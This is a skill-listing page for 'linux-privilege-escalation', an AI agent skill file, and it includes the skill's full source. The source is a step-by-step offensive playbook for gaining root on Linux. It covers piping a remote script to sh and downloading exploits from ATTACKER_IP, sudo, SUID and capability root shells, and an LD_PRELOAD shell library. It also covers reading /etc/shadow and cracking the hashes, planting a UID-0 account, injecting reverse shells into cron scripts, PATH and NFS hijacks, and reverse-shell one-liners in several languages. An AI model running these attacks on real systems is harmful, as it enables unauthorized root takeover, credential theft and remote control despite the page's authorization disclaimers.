linux-privilege-escalation
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.
About this skill
The `linux-privilege-escalation` skill empowers an AI agent to conduct comprehensive and systematic security assessments focused on privilege escalation within Linux environments. This skill is designed to uncover and potentially exploit various security weaknesses, including misconfigurations, vulnerable services, insecure file permissions, kernel exploits, and other vectors that could allow a low-privilege user to gain root-level control. By leveraging this skill, the AI agent can systematically probe a target Linux system, identify exploitable paths, and demonstrate the feasibility of privilege escalation in a controlled and authorized manner. This skill is classified as 'offensive' and must only be used for authorized security assessments, defensive validation, or controlled educational environments.
Best use case
Penetration Testing: Systematically identifying and exploiting privilege escalation vulnerabilities on Linux systems during authorized security assessments. Vulnerability Assessment: Analyzing Linux servers for potential privilege escalation paths to strengthen security posture. Red Teaming Operations: Simulating advanced attacker techniques to test an organization's defensive capabilities. Security Education & Training: Providing a controlled environment for cybersecurity professionals to learn and practice privilege escalation techniques ethically. Defensive Validation: Proactively testing internal Linux systems against known and emerging privilege escalation methods to ensure robust security.
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.
A detailed report identifying discovered privilege escalation vulnerabilities (e.g., misconfigured SUID binaries, insecure cron jobs, kernel exploits, weak file permissions, unpatched services). Demonstration of successful privilege escalation to root or an elevated user, with evidence (e.g., `whoami` output as root, access to restricted files). Recommendations for mitigating identified vulnerabilities to improve the security posture of the Linux system. A clear assessment of the ease or difficulty of achieving root access given the current system configuration.
Practical example
Example input
Analyze the current Linux system for any privilege escalation vectors and attempt to gain root access. Document all identified vulnerabilities and successful escalations.
Example output
Privilege Escalation Assessment Report: 1. Vulnerability Found: SUID Binary - /usr/bin/nmap Description: nmap found with SUID bit set, allowing execution as root. Exploited by running 'nmap --interactive', then '!sh' to get a root shell. Status: Exploited (Root access achieved). 2. Vulnerability Found: Weak SUDO Permissions - User 'devuser' Description: User 'devuser' can run 'ALL' commands as 'ALL' without a password. Exploited: `sudo su` command was used to gain root. Status: Exploited (Root access achieved). 3. Vulnerability Found: Kernel Exploit - 'Dirty Pipe' (CVE-2022-0847) Description: System running vulnerable kernel version 5.10.x. Proof-of-concept exploit applied to overwrite `/etc/passwd`. Status: Exploited (Root access achieved). 4. No other immediate privilege escalation paths identified with current user context after initial root access.
When to use this skill
- When conducting an authorized penetration test on a Linux system where initial low-privilege access has been established.
- To proactively audit the security of your own Linux infrastructure against common and advanced privilege escalation techniques.
- In controlled lab environments for ethical hacking practice, training, and research.
- As part of a red team exercise with clear scope and rules of engagement.
When not to use this skill
- On any system for which you do not have explicit, written authorization from the owner. Unauthorized use is illegal and unethical.
- In production environments without thorough prior testing, a rollback plan, and strict monitoring, as exploitation attempts can cause instability or data loss.
- Without understanding the potential legal, ethical, and operational consequences of using offensive security tools.
- If the goal is simply to scan for vulnerabilities without attempting exploitation; dedicated vulnerability scanners might be more appropriate.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/linux-privilege-escalation/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How linux-privilege-escalation Compares
| Feature / Agent | linux-privilege-escalation | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | easy | N/A |
Frequently Asked Questions
What does this skill do?
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as easy. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
AI Agents for Startups
Explore AI agent skills for startup validation, product research, growth experiments, documentation, and fast execution with small teams.
SKILL.md Source
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
<!-- security-allowlist: curl-pipe-bash -->
# Linux Privilege Escalation
## Purpose
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
## Inputs / Prerequisites
### Required Access
- Low-privilege shell access to target Linux system
- Ability to execute commands (interactive or semi-interactive shell)
- Network access for reverse shell connections (if needed)
- Attacker machine for payload hosting and receiving shells
### Technical Requirements
- Understanding of Linux filesystem permissions and ownership
- Familiarity with common Linux utilities and scripting
- Knowledge of kernel versions and associated vulnerabilities
- Basic understanding of compilation (gcc) for custom exploits
### Recommended Tools
- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
- Linux Exploit Suggester (LES)
- GTFOBins reference for binary exploitation
- John the Ripper or Hashcat for password cracking
- Netcat or similar for reverse shells
## Outputs / Deliverables
### Primary Outputs
- Root shell access on target system
- Privilege escalation path documentation
- System enumeration findings report
- Recommendations for remediation
### Evidence Artifacts
- Screenshots of successful privilege escalation
- Command output logs demonstrating root access
- Identified vulnerability details
- Exploited configuration files
## Core Workflow
### Phase 1: System Enumeration
#### Basic System Information
Gather fundamental system details for vulnerability research:
```bash
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
```
#### User and Permission Enumeration
```bash
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
```
#### Network Information
```bash
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
```
#### Process and Service Enumeration
```bash
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
```
#### Environment Variables
```bash
# Full environment
env
# PATH variable (for hijacking)
echo $PATH
```
### Phase 2: Automated Enumeration
Deploy automated scripts for comprehensive enumeration:
```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./les.sh
```
Transfer scripts to target system:
```bash
# On attacker machine
python3 -m http.server 8000
# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
### Phase 3: Kernel Exploits
#### Identify Kernel Version
```bash
uname -r
cat /proc/version
```
#### Search for Exploits
```bash
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
# Manual search on exploit-db
searchsploit linux kernel [version]
```
#### Common Kernel Exploits
| Kernel Version | Exploit | CVE |
|---------------|---------|-----|
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
#### Compile and Execute
```bash
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
# Compile on target
gcc exploit.c -o exploit
# Execute
./exploit
```
### Phase 4: Sudo Exploitation
#### Enumerate Sudo Privileges
```bash
sudo -l
```
#### GTFOBins Sudo Exploitation
Reference https://gtfobins.github.io for exploitation commands:
```bash
# Example: vim with sudo
sudo vim -c ':!/bin/bash'
# Example: find with sudo
sudo find . -exec /bin/sh \; -quit
# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
# Example: less with sudo
sudo less /etc/passwd
!/bin/bash
```
#### LD_PRELOAD Exploitation
When env_keep includes LD_PRELOAD:
```c
// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
```bash
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
```
### Phase 5: SUID Binary Exploitation
#### Find SUID Binaries
```bash
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
```
#### Exploit SUID Binaries
Reference GTFOBins for SUID exploitation:
```bash
# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d
# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
# Example: find with SUID
find . -exec /bin/sh -p \; -quit
```
#### Password Cracking via SUID
```bash
# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt
# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
#### Add User to passwd (if nano/vim has SUID)
```bash
# Generate password hash
openssl passwd -1 -salt new newpassword
# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
```
### Phase 6: Capabilities Exploitation
#### Enumerate Capabilities
```bash
getcap -r / 2>/dev/null
```
#### Exploit Capabilities
```bash
# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```
### Phase 7: Cron Job Exploitation
#### Enumerate Cron Jobs
```bash
# System crontab
cat /etc/crontab
# User crontabs
ls -la /var/spool/cron/crontabs/
# Cron directories
ls -la /etc/cron.*
# Systemd timers
systemctl list-timers
```
#### Exploit Writable Cron Scripts
```bash
# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh
```
### Phase 8: PATH Hijacking
```bash
# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")
# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary # Execute SUID binary
```
### Phase 9: NFS Exploitation
```bash
# On target - look for no_root_squash option
cat /etc/exports
# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
# On target - execute
/share/shell
```
## Quick Reference
### Enumeration Commands Summary
| Purpose | Command |
|---------|---------|
| Kernel version | `uname -a` |
| Current user | `id` |
| Sudo rights | `sudo -l` |
| SUID files | `find / -perm -u=s -type f 2>/dev/null` |
| Capabilities | `getcap -r / 2>/dev/null` |
| Cron jobs | `cat /etc/crontab` |
| Writable dirs | `find / -writable -type d 2>/dev/null` |
| NFS exports | `cat /etc/exports` |
### Reverse Shell One-Liners
```bash
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Netcat
nc -e /bin/bash ATTACKER_IP 4444
# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
```
### Key Resources
- GTFOBins: https://gtfobins.github.io
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
## Constraints and Guardrails
### Operational Boundaries
- Verify kernel exploits in test environment before production use
- Failed kernel exploits may crash the system
- Document all changes made during privilege escalation
- Maintain access persistence only as authorized
### Technical Limitations
- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
- AppArmor/SELinux may restrict exploitation techniques
- Container environments limit kernel-level exploits
- Hardened systems may have restricted sudo configurations
### Legal and Ethical Requirements
- Written authorization required before testing
- Stay within defined scope boundaries
- Report critical findings immediately
- Do not access data beyond scope requirements
## Examples
### Example 1: Sudo to Root via find
**Scenario**: User has sudo rights for find command
```bash
$ sudo -l
User user may run the following commands:
(root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
```
### Example 2: SUID base64 for Shadow Access
**Scenario**: base64 binary has SUID bit set
```bash
$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64
$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::
# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt
```
### Example 3: Cron Job Script Hijacking
**Scenario**: Root cron job executes writable script
```bash
$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh
$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)
```
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |
| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |
## When to Use
This skill is applicable to execute the workflow or actions described in the overview.Related Skills
mtls-configuration
Configure mutual TLS (mTLS) for zero-trust service-to-service communication. Use when implementing zero-trust networking, certificate management, or securing internal service communication.
mobile-security-coder
Expert in secure mobile coding practices specializing in input validation, WebView security, and mobile-specific security patterns.
malware-analyst
Expert malware analyst specializing in defensive malware research, threat intelligence, and incident response. Masters sandbox analysis, behavioral analysis, and malware family identification.
laravel-security-audit
Security auditor for Laravel applications. Analyzes code for vulnerabilities, misconfigurations, and insecure practices using OWASP standards and Laravel security best practices.
frontend-security-coder
Expert in secure frontend coding practices specializing in XSS prevention, output sanitization, and client-side security patterns.
frontend-mobile-security-xss-scan
You are a frontend security specialist focusing on Cross-Site Scripting (XSS) vulnerability detection and prevention. Analyze React, Vue, Angular, and vanilla JavaScript code to identify injection poi
differential-review
Security-focused code review for PRs, commits, and diffs.
dependency-management-deps-audit
You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for known vulnerabilities, licensing issues, outdated packages, and provide actionable remediation strategies.
cloud-penetration-testing
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
azure-security-keyvault-keys-java
Azure Key Vault Keys Java SDK for cryptographic key management. Use when creating, managing, or using RSA/EC keys, performing encrypt/decrypt/sign/verify operations, or working with HSM-backed keys.
azure-security-keyvault-keys-dotnet
Azure Key Vault Keys SDK for .NET. Client library for managing cryptographic keys in Azure Key Vault and Managed HSM. Use for key creation, rotation, encryption, decryption, signing, and verification.
azure-keyvault-py
Azure Key Vault SDK for Python. Use for secrets, keys, and certificates management with secure storage.